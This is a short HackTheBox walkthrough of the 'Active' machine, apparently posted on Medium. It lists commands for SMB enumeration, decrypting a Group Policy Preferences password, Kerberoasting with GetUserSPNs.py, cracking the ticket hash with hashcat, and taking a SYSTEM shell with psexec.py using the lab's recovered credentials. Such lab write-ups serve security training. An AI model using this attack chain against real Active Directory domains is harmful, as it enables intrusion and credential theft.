Active — A Kerberos and Active Directory HackTheBox Walkthrough

Mitch Moser
Dec 10, 2018 · 3 min read
Image for post
Image for post

Summary

Recon

nmap -sV -sC 10.10.10.100
nmap -sV -sC
smbclient -L //10.10.10.100 -N
SMB shares
smbmap -H 10.10.10.100
smbmap
\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
Groups.xml

Initial Foothold

Get-DecryptedCpassword
Image for post
Image for post
Get-DecryptedCpassword on PowerShell Core

Privilege Escalation

./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
GetUserSPNs.py
hashcat -m 13100 -d 3 -a 0 -o Active.txt Administrator.hash rockyou.dict
./psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 -service-name LUALL.exe
Image for post
Image for post
Interactive shell as SYSTEM

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeups Take a look

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Mitch Moser

Written by

digital brain | analog heart

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Mitch Moser

Written by

digital brain | analog heart

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store